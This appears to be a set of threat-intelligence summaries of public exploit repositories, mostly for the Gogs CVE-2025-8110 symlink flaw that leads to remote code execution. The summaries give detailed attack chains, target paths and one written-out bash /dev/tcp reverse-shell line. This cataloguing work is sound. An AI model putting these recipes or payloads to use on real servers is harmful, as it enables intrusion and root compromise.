Gogs PutContents API symlink path traversal leading to code execution

Repository contains a README and a single Python exploit script, poc.py. The script is a standalone operational proof-of-concept for CVE-2025-8110 against Gogs v0.13.3, exploiting the UpdateRepoFile symlink handling flaw to achieve remote code execution. The exploit logs into the target web application using supplied credentials, scrapes CSRF tokens from HTML, creates a personal API token from /user/settings/applications, creates a new repository via POST /api/v1/user/repos, then clones that repository locally using Git over HTTP with embedded credentials. It creates and pushes a symlink named x pointing to .git/config, then uses PUT /api/v1/repos/{owner}/{repo}/contents/x to overwrite the server-side working copy's .git/config with a malicious configuration containing core.sshCommand set to a bash reverse shell. A second PUT to the same endpoint is used to trigger Gogs' git fetch origin behavior, which reads the poisoned config and executes the shell command. The exploit includes a local pre-check for a listening socket by parsing /proc/net/tcp, uses subprocess to invoke git commands, and disables TLS verification warnings. Overall, this is a real exploit rather than a detector: it provides full end-to-end automation for authenticated web-to-RCE exploitation of vulnerable Gogs instances.

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 in Gogs. It contains one main exploit script (CVE-2025-8110.py), a README describing the vulnerability and usage, a requirements file, and a license. The script uses requests, BeautifulSoup, and local git subprocess calls to automate the full exploitation chain. Exploit flow: it logs into Gogs through /user/login by scraping a CSRF token, creates a personal application token through /user/settings/applications, creates a new repository through /api/v1/user/repos, clones that repository locally into /tmp/<repo>, creates and commits a symlink named malicious_link pointing to .git/config, pushes the symlink, and finally calls PUT /api/v1/repos/<user>/<repo>/contents/malicious_link with base64-encoded content containing a crafted git config. That config injects sshCommand set to a bash reverse shell. Because the vulnerable API follows the symlink, the server-side .git/config is overwritten, leading to remote code execution when Gogs later performs an SSH-related git operation. The exploit is operational rather than a simple detector: it includes a working payload, automates token generation and repository setup, and supports optional proxying through localhost:8080 for interception. It requires valid credentials on the target Gogs instance and assumes the target is vulnerable to symlink-based file overwrite through the contents API. The primary capability is authenticated server-side RCE with a reverse shell callback to an attacker-supplied host and port.

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 affecting Gogs. It contains two files: a README describing the attack flow and usage, and a single executable script, exploit.py, which implements the full exploit chain. The exploit is an authenticated web/API attack against Gogs. It first logs into the target web application using /user/login and extracts a CSRF token from the login page. It then uses a supplied API token to create a new repository through /api/v1/user/repos. Next, it locally clones that repository with embedded credentials in the clone URL, creates a symlink named malicious_link pointing to .git/config, commits it, and pushes it back to the server using git. Finally, it abuses the Gogs contents API at /api/v1/repos/{username}/{repo_name}/contents/malicious_link to write attacker-controlled base64 content through the symlink, thereby overwriting .git/config. The overwritten git config injects core.sshCommand with a hardcoded bash reverse shell payload: bash -c 'bash -i >& /dev/tcp/<host>/<port> 0>&1' #. The intended result is server-side command execution and a reverse shell callback to the attacker. The script supports an optional local interception proxy at localhost:8080, disables TLS verification warnings, and requires valid Gogs credentials, an API token, and git installed locally. Overall, this is a real exploit rather than a detector. It is operational but not highly modular: the payload is fixed to a bash reverse shell, though the callback host and port are user-supplied. The repository purpose is clearly to demonstrate authenticated RCE in vulnerable Gogs versions via symlink bypass and malicious sshCommand injection.

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-8110 targeting Gogs. It contains two files: a README describing the vulnerability and usage, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The script performs end-to-end authenticated exploitation. It accepts a target Gogs base URL, attacker listener host/port, and either credentials or an API token. If no token is supplied, it creates one via the Gogs API. It then creates a repository named pwn-repo, initializes a local Git repository in a temporary directory, creates a symlink pointing to .git/config, commits it, and pushes it to the remote Git service. Notably, the push target is hardcoded to 127.0.0.1:3001 and the HTTP Host header is hardcoded to staging-v2-code.dev.silentium.htb, indicating the exploit was tailored to a specific environment or lab setup. After pushing the symlink, the script queries the repository contents API to obtain the symlink SHA, then uses the contents update API to overwrite the symlink target. The uploaded content is a malicious .git/config containing an injected sshCommand directive with a bash reverse shell payload. The payload connects back to the attacker-supplied lhost:lport using /dev/tcp. The exploit reports success after the malicious config is uploaded, but actual code execution is intended to occur when the repository is later cloned or pulled. Primary capabilities: authenticated API token creation, repository creation, Git-based symlink delivery, API-based overwrite of .git/config through the symlink, and reverse-shell command injection. This is a real exploit rather than a detector. Its payload is basic but functional, making the maturity best described as OPERATIONAL.

Repository contains two files: a README describing CVE-2025-8110 and a single Python exploit implementation (exploit.py). The exploit targets Gogs <= 0.13.3 and abuses the PutContents API path validation weakness by first committing a symlink into an attacker-controlled repository and then using the API to write through that symlink to an arbitrary server-side file. The code is a standalone Python CLI tool, not tied to a major exploitation framework. Based on the visible code and README, its workflow is: normalize target URL, create a requests session, optionally verify the target is Gogs/vulnerable, authenticate, create a repository, push a symlink via local git operations, invoke the vulnerable /api/v1/repos/.../contents/... endpoint, then optionally trigger execution depending on the selected strategy. Supported capabilities include check-only detection, arbitrary file write, SSH authorized_keys planting, cron-based reverse shell setup, .git/config sshCommand poisoning, and Git hook overwrite/triggering. The script also supports cleanup, JSON-style reporting, proxying, SSL verification control, and configurable timeout/output. Fingerprintable targets include the Gogs REST API prefix /api/v1 and sensitive filesystem paths such as /root/.ssh/authorized_keys, /etc/crontab, .git/config, and hooks/pre-receive. Overall, this is an operational authenticated web exploit that escalates a repository content-write primitive into arbitrary file overwrite and practical RCE on misconfigured or root-running Gogs deployments.

Repository contains a single Python exploit script and a short README. The main file, CVE-2025-8110.py, is a standalone exploit targeting Gogs and automates an authenticated remote code execution chain. It logs into a Gogs instance, creates an application token from /user/settings/applications, creates a new repository through /api/v1/user/repos, clones that repository locally with embedded credentials, adds a symlink named malicious_link pointing to .git/config, commits and pushes it, then uses the repository contents API at /api/v1/repos/{username}/{repo_name}/contents/malicious_link to write attacker-controlled content through the symlink. The written content is a crafted git config that sets sshCommand to a bash reverse shell payload. The intended effect is arbitrary command execution on the target, with a reverse shell connecting back to the attacker-supplied host and port. The script supports an intercepting proxy at localhost:8080, disables TLS verification, and requires valid credentials plus repository creation capability. The README mainly documents command-line usage, but it inconsistently references CVE-2025-59528 while the script identifies itself as CVE-2025-8110; functionally, the code is clearly an exploit rather than a detector.

This repository is primarily a collection of HackTheBox writeups, but it also contains real exploit automation in the `VariaType/` directory. The actionable exploit consists of one Bash orchestrator (`exploit_variatype.sh`) and four Python phase scripts. The exploit is not tied to a common framework like Metasploit; it is custom automation for a multi-stage Linux target compromise. Main exploit capabilities: (1) reconnaissance and extraction of credentials from an exposed `.git` repository on `portal.variatype.htb`; (2) login and LFI verification against `download.php`; (3) preparation of malicious font files and a crafted designspace document to exploit CVE-2025-66034 in fontTools varLib, causing arbitrary file write of a PHP webshell to `/var/www/portal.variatype.htb/public/files/shell.php`; (4) privilege escalation to user `steve` using a ZIP filename command injection payload associated with CVE-2024-25082, which appends an attacker SSH key into `/home/steve/.ssh/authorized_keys`; and (5) privilege escalation to root by abusing `sudo /usr/bin/python3 /opt/font-tools/install_validator.py` with a URL-encoded absolute path traversal to write the attacker’s public key into `/root/.ssh/authorized_keys`. Repository structure: most files are Markdown writeups for HTB machines/challenges. Only 5 files contain exploit code, all under `VariaType/`. `phase1_git_extract.py` handles exposed Git extraction and credential recovery. `phase2_rce_exploit.py` generates malicious font/designspace artifacts for the webshell stage, though upload is partly left manual in that script. `phase3_privesc_steve.py` generates an SSH key, builds an evil ZIP with a filename-based command injection payload, serves it over HTTP, and attempts to place it on the target for later processing. `phase4_privesc_root.py` serves a root public key and invokes the vulnerable validator script over SSH as steve to gain root SSH access. `exploit_variatype.sh` ties the phases together into a mostly automated end-to-end attack. Overall, this is a valid exploit repository with operational code, not just detection logic. The exploit targets a web-exposed Linux application stack and culminates in full root compromise with SSH persistence.

This repository is a small standalone Python exploit for CVE-2025-8110 in Gogs. It contains two files: a README with setup and usage instructions, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The exploit workflow is straightforward and operational: it authenticates to the Gogs API using a personal access token, creates a new repository, then locally clones that repository using attacker-supplied username/password credentials. Inside the cloned repository it creates a symlink named malicious_link pointing to .git/config, commits it, and pushes it back to the server with git. It then calls the Gogs repository contents API on /api/v1/repos/{username}/{repo_name}/contents/malicious_link, first to retrieve the object SHA and then to issue a PUT request containing base64-encoded replacement content. Because the vulnerability is described as improper symlink validation in the PutContents API, the overwrite lands on the internal .git/config file rather than a normal repository file. The injected .git/config payload sets sshCommand to a bash reverse shell using /dev/tcp/<LHOST>/<LPORT>. If the target later invokes that sshCommand in the relevant git/ssh context, the attacker receives remote code execution as a reverse shell. The script disables TLS verification warnings, uses requests for API interaction, subprocess for git operations, and requires git to be installed locally. Overall, this is a real exploit with a hardcoded but effective payload, intended to achieve authenticated remote code execution against a vulnerable Gogs instance.

This repository contains a single Python exploit script, gogs_rce.py, plus a README demonstrating usage. It is a real authenticated remote code execution exploit targeting Gogs v0.13.3, identified in the repository as CVE-2025-8110. The exploit is not part of a larger framework. The script automates a multi-step attack chain against a Gogs instance. First, it authenticates to the target using a supplied API token and queries /api/v1/user to determine the internal username associated with the account. Next, it creates a new repository through /api/v1/user/repos. It then initializes a temporary local Git repository, creates a symlink named evil.link pointing to the server-side Git hook path /root/gogs-repositories/<username>/<repo>.git/hooks/pre-receive, commits that symlink, and pushes it to the target repository using HTTP(S) Git authentication with the supplied email and password embedded in the clone/push URL. After the symlink is present in the repository, the script uses the Gogs contents API at /api/v1/repos/<username>/<repo>/contents/evil.link to retrieve the object SHA and then update the symlink target content with a shell script containing a Python3 reverse shell one-liner. Because the symlink points to the pre-receive hook on disk, this effectively overwrites the hook. Finally, the script commits a trivial file (trigger.txt) and performs another git push, causing the pre-receive hook to execute and connect back to the attacker-controlled LHOST:LPORT. The README shows this resulting in a root shell, though the actual privilege level depends on the user running the Gogs process. Repository structure is minimal: README.md documents prerequisites and example execution, while gogs_rce.py contains the full exploit logic, argument parsing, API interaction, local Git operations, payload generation, and trigger step. The exploit’s main capability is authenticated RCE with reverse shell delivery via Git hook overwrite using a symlink attack.

This repository is a small standalone Python exploit for CVE-2025-8110 affecting Gogs <= 0.13.3. It is not part of a larger exploitation framework. The repo contains three files: a README with usage and attack-chain explanation, a requirements.txt listing requests/urllib3/beautifulsoup4, and the main exploit script cve-2025-8110.py. The exploit script automates a full end-to-end RCE chain against a vulnerable Gogs server. Based on the visible code and README, its workflow is: register a disposable user account (or reuse supplied credentials), log in through the web interface, scrape CSRF tokens from HTML, obtain an API bearer token, create a repository, clone/push content locally using git, add a malicious relative symlink named malicious_link pointing to .git/config, then use the Gogs contents API to overwrite the repository’s Git configuration through that symlink. The malicious config embeds an sshCommand that executes a callback to an attacker-controlled host and port. Finally, the script triggers execution by cloning the repository over SSH, causing the target host to run the injected command and connect back to the attacker. Primary capabilities include authenticated web exploitation, API abuse, local git orchestration via subprocess, repository manipulation, arbitrary overwrite of .git/config through a symlink bypass, and remote code execution with reverse-shell style behavior. The script also supports skipping registration when credentials are already known, disabling TLS verification, and optionally routing traffic through a local proxy at 127.0.0.1:8080 for debugging. The attack surface is both web and network based: the exploit interacts with Gogs HTTP endpoints for registration/authentication/API operations and then uses SSH Git access to trigger the payload. The most important fingerprintable artifacts are the /user/sign_up path, CSRF form field extraction, the targeted .git/config file, the malicious symlink name malicious_link, the attacker callback host/port, and the SSH clone operation against the target. Overall, this is a real operational exploit rather than a detector or fake PoC.

This repository is a small standalone Python exploit for CVE-2025-8110 targeting Gogs <= 0.13.3. The repo contains one main code file (CVE-2025-8110.py), a README describing the vulnerability and usage, and an MIT license. The exploit is not part of a larger framework. The exploit automates an authenticated arbitrary file write via symlink traversal in Gogs' PutContents API. Its workflow is: detect the target version, optionally self-register a new user, log in via the web interface, create an API token, create a repository, locally push a symlink whose target is an arbitrary absolute path on the server, and then invoke the vulnerable contents API to write attacker-controlled data through that symlink. The intended outcome is host-level compromise when Gogs runs with elevated privileges. Capabilities include account self-registration, session-based login, API token creation, repository creation, symlink-based Git commit/push, arbitrary file overwrite, and optional cleanup of the created repository. The exploit supports arbitrary content input either inline or from a local file. The README and script explicitly demonstrate overwriting /root/.ssh/authorized_keys for persistent root SSH access and /etc/crontab for command execution via cron, including a bash reverse shell example. Operationally, this is more than a simple detector: it is a working exploitation script with a hardcoded exploitation chain and user-supplied payload content, making it OPERATIONAL rather than a basic POC. The attack surface is primarily web/API-based, with the vulnerable endpoint centered on /api/v1/repos/{owner}/{repo}/contents/{path}. The code also interacts with /api/v1/version, /user/sign_up, /user/login, and /api/v1/users/{user}/tokens as part of setup and exploitation.

This repository is a small standalone Python exploit PoC for CVE-2025-8110 in Gogs. It contains one main exploit script (CVE-2025-8110-RCE.py), a README with usage instructions, and a requirements file. The script automates an authenticated remote code execution chain against Gogs by logging into the web UI, creating a repository through the API, cloning it locally with embedded credentials, adding and pushing a symlink named 'malicious_link' that points to '.git/config', and then using the repository contents API to overwrite the symlink target with attacker-controlled git configuration. The malicious configuration injects an 'sshCommand' directive containing a bash reverse shell. The intended effect is that when the Gogs server later performs a git operation that uses SSH transport, the injected sshCommand executes and connects back to the attacker at the supplied host and port. The exploit uses both session-based authentication and a hardcoded API token, disables TLS verification, optionally supports a local proxy at localhost:8080, and relies on local git being installed to perform clone/add/commit/push operations. Main capabilities: authenticated login, repository creation, symlink-based path traversal/bypass setup, API-driven overwrite of .git/config, and reverse-shell RCE delivery. The code is operational rather than a simple detector because it includes a complete exploitation workflow and a concrete payload, though payload customization is limited to attacker host/port arguments. Notable hardcoded values include username 'pwnuser', a static token string, local temp path '/tmp/{repo_name}', and an injected remote URL 'git@localhost:gogs/{repo_name}.git'.

Repository contains a small proof-of-concept for achieving RCE against Gogs versions prior to 0.13.0 by abusing command injection in the Git hook mechanism. Structure: - README.md: States affected product/version and describes the issue as command injection via crafted Git hooks requiring push access. - bash.sh: Example malicious server-side post-receive hook that reads standard hook input (oldrev/newrev/refname) and spawns a background reverse shell using bash TCP redirection to attacker.com:4444. - exploit.py: Local helper that creates a fake repository directory at /tmp/malicious_repo, writes a .git/hooks/post-receive hook that runs `id > /tmp/gogs_exploited`, marks it executable, and instructs the user to push to trigger execution. Capabilities: plants/illustrates a malicious post-receive hook payload and demonstrates arbitrary command execution; includes an example reverse shell payload. No actual network push logic is implemented in code—triggering is implied by manually pushing the prepared repository to a vulnerable Gogs server where the hook would execute.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-8110, a high-severity remote code execution (RCE) vulnerability in Gogs, a self-hosted Git service. The exploit leverages a symlink path traversal flaw in the Gogs API, specifically the 'PutContents' endpoint, which fails to validate whether symlinks point outside the repository. The attacker authenticates to the Gogs instance, creates a symlink in a repository pointing to an arbitrary file on the server, and then uses the API to overwrite that file with attacker-controlled content. If the target is the '.git/config' file, the exploit injects a malicious SSH configuration that, when triggered by a Git operation, causes the server to execute a reverse shell to the attacker's host. The repository consists of two files: the main exploit script (CVE-2025-8110.py) written in Python, and a detailed README.md explaining the vulnerability, exploitation steps, mitigation advice, and usage instructions. The exploit is network-exploitable, requires low privileges, and is effective against unpatched Gogs instances. No hardcoded IPs or domains are present; the attacker supplies the target URL and payload parameters at runtime.

This repository provides a fully operational exploit for CVE-2025-8110, a critical vulnerability in Gogs (version 0.13.2, likely affecting other versions) that allows arbitrary file overwrite and remote code execution (RCE) via symlink abuse in the API. The exploit works by creating a malicious symlink in a git repository (pointing to a sensitive file such as .git/config), pushing it to the server, and then using the Gogs API to overwrite the symlinked file. By injecting a malicious sshCommand into the config, the attacker achieves RCE when the server performs a git operation involving SSH. The repository contains two main Python scripts: 'exploit-cve-2025-8110.py' (a full-featured, interactive exploit and verification tool) and 'exploit_only_cve_2025_8110.py' (a minimal, pure exploit script). The included markdown report details the vulnerability, exploitation steps, and verification results. The exploit targets the Gogs API endpoint at /api/v1/repos/{user}/{repo}/contents/{symlink_file} and abuses the server's file system at /data/git/gogs-repositories/{user}/{repo}.git/config. The payload is a git config file with a malicious sshCommand that, when triggered, executes arbitrary shell commands on the server. The exploit is operational and demonstrates end-to-end compromise, including file creation as proof of RCE. The repository also contains various Gogs test data and git hook samples, but the core exploit logic is in the two Python scripts.

This repository provides a Proof of Concept (PoC) exploit for CVE-2025-8110, a remote code execution vulnerability in Gogs, a self-hosted Git service. The main exploit script, 'CVE-2025-8110.py', automates the process of registering a user, logging in, generating an application token, creating a malicious repository, and injecting a symlink that abuses the SSH server's configuration handling. The exploit ultimately achieves arbitrary command execution by injecting a reverse shell command into the repository's configuration, which is then executed by the Gogs server. The payload is a bash reverse shell that connects back to the attacker's specified host and port. The repository includes supporting files for Python dependencies and a Docker Compose configuration for testing. The exploit targets Gogs instances with the internal SSH server enabled and accessible, and requires the ability to register a new user and create repositories. The attack vector is network-based, leveraging HTTP(S) API endpoints and Git operations. The endpoints used are typical Gogs user and repository management APIs, and the exploit creates a symlink to '.git/config' within the repository to facilitate the attack.

This repository contains a working proof-of-concept (PoC) exploit for CVE-2025-8110, a high-severity remote code execution vulnerability in Gogs, a self-hosted Git service. The exploit leverages a symlink path traversal flaw in the Gogs API (specifically, the /api/v1/repos/{repo}/contents/{path} endpoint) to create a symlink in a repository that points outside the repo directory. The attacker then uses the same API to overwrite arbitrary files on the server by writing through the symlink. If the attacker targets the .git/config file and injects a malicious SSH command, remote code execution is achieved when a git operation is performed by the Gogs service user. The exploit requires valid credentials (or the ability to register) and network access to the Gogs instance. The repository consists of a single Python exploit script (CVE-2025-8110.py) and a detailed README.md explaining the vulnerability, exploitation steps, mitigation advice, and usage instructions. The exploit is a PoC but demonstrates full compromise potential, including arbitrary file write and RCE via reverse shell.